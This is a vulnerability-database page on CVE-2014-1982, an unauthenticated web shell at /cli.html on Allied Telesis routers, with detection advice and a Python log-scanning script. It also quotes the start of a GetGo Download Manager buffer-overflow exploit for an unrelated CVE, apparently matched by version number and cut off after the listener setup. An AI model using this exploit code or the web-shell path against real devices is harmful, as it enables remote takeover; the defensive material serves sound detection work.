CVE-2014-1982
Published 2014-03-31
Priority: P268 · critical · CVSS 2.0 score 10
CVSS vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: public (Exploit-DB)
EPSS: 9.83% (95.0th percentile)
The administrative interface in Allied Telesis AT-RG634A ADSL Broadband router 3.3+, iMG624A firmware 3.5, iMG616LH firmware 2.4, and iMG646BD firmware 3.5 allows remote attackers to gain privileges and execute arbitrary commands via a direct request to cli.html.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alliedtelesis | at-rg634a_firmware | — | — |
| alliedtelesis | img616lh_firmware | — | — |
| alliedtelesis | img624a_firmware | — | — |
| alliedtelesis | img646bd_firmware | — | — |
Detection & IOCs
- Monitor HTTP server logs for unauthenticated GET/POST requests to /cli.html on Allied Telesis routers; any access to this path without prior authentication is indicative of exploitation.
- Detect direct requests to cli.html from external/untrusted sources; the vulnerability is exploitable remotely without authentication.
- The vendor workaround restricts management access by IP allowlist; without this control, /cli.html is accessible to any host by default.
- Firmware version 3.8.05 reportedly addresses the issue, but this was unconfirmed by the researcher at time of disclosure.
- The AT-RG634A product is end-of-life and no longer supported by Allied Telesis, meaning no official patch will be issued for this device.
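The log check described in the list above, as an added example (not from the advisory, the vendor or this site): it flags requests to /cli.html in Common Log Format lines and rates each by source. Assumptions: the log comes from a proxy or sensor in front of the router that records the HTTP auth user, and `MGMT_ALLOWLIST`, the sample lines and the severity labels are constructed for illustration.

```python
import ipaddress
import posixpath
import re
from urllib.parse import unquote

# Assumption: hosts allowed to manage the router (the vendor workaround is an IP allowlist).
MGMT_ALLOWLIST = [ipaddress.ip_network("10.20.0.0/28")]  # constructed value
RANK = {"high": 0, "medium": 1, "info": 2}
# Common Log Format: src ident user [time] "METHOD target PROTO" status size
CLF = re.compile(r'^(?P<src>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
                 r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+')
SAMPLE_LOG = [  # constructed lines using documentation address ranges, not real traffic
    '203.0.113.45 - - [31/Mar/2014:10:02:11 +0000] "GET /cli.html HTTP/1.1" 200 1843',
    '198.51.100.7 - - [31/Mar/2014:10:05:40 +0000] "POST /%63LI.html?x=1 HTTP/1.1" 200 512',
    '10.20.0.5 - admin [31/Mar/2014:10:07:02 +0000] "GET /cli.html HTTP/1.1" 200 1843',
    '10.20.0.5 - - [31/Mar/2014:10:08:15 +0000] "GET /index.html HTTP/1.1" 200 901',
    '10.20.0.9 - - [31/Mar/2014:10:09:00 +0000] "GET /./cli.html HTTP/1.1" 200 1843',
]

def normalized_path(target):
    """Drop query/fragment, percent-decode, collapse ./ ../ // and lowercase (over-matches on purpose)."""
    raw = re.split(r"[?#]", target, maxsplit=1)[0]
    return posixpath.normpath("/" + unquote(raw).lstrip("/")).lower()

def is_allowlisted(src):
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:  # hostname or garbage in the source field
        return False
    return any(addr in net for net in MGMT_ALLOWLIST)

def find_cli_requests(lines):
    """Return (severity, source, method) for every request to /cli.html, worst first."""
    findings = []
    for line in lines:
        m = CLF.match(line)
        if not m or normalized_path(m["target"]) != "/cli.html":
            continue
        if not is_allowlisted(m["src"]):
            severity = "high"    # source outside the management allowlist
        elif m["user"] == "-":
            severity = "medium"  # management host, but no authenticated user logged
        else:
            severity = "info"
        findings.append((severity, m["src"], m["method"]))
    return sorted(findings, key=lambda f: RANK[f[0]])

if __name__ == "__main__":
    print(*find_cli_requests(SAMPLE_LOG), sep="\n")
```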
No detection rules found.
Exploit-DB
Allied Telesis AT-RG634A ADSL Broadband Router - Web Shell
exploitdb·2014-03-26·CVSS 10.0
---
*Title:*
Allied Telesis AT-RG634A ADSL Broadband router hidden administrative
unauthenticated webshell.
*Vulnerability Information:*
- CVE: CVE-2014-1982
- Type of Vulnerability:
- CWE-78 : OS Command Injection
- CWE-306 : Missing Authentication for Critical Function
*Affected products:*
- Allied Telesis AT-RG634A ADSL Broadband router. (version 3.3+ and
probably others)
Other products like,
- Allied Telesis iMG624A (firmware version, 3.5)
- Allied Telesis iMG616LH (firmware version, +2.4)
- Allied Telesis iMG646BD (firmware version, 3.5)
*Vendor:*
- Allied Telesis : http://www.alliedtelesis.com//
has the same vulnerability, but the vendor reports that the version
3.8.05 of the firmware has already addressed this issue
Exploit-DB
GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution
exploitdb·2014-03-09·CVSS 10.0
---
```python
#!/usr/bin/python
# Exploit Title: GetGo Download Manager HTTP Response Header Buffer Overflow Remote Code Execution
# Version: v4.9.0.1982
# CVE: CVE-2014-2206
# Date: 2014-03-09
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: http://www.rcesecurity.com
# Software Link: http://www.getgosoft.com
# Tested on: WinXP SP3-GER
#
# Howto / Notes:
# SEH overwrite was taken from outside of loaded modules, because all modules are SafeSEH-enabled
#
from socket import *
from time import sleep
from struct import pack
host = "192.168.0.1"
port = 80
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection
```
No writeups or analysis indexed.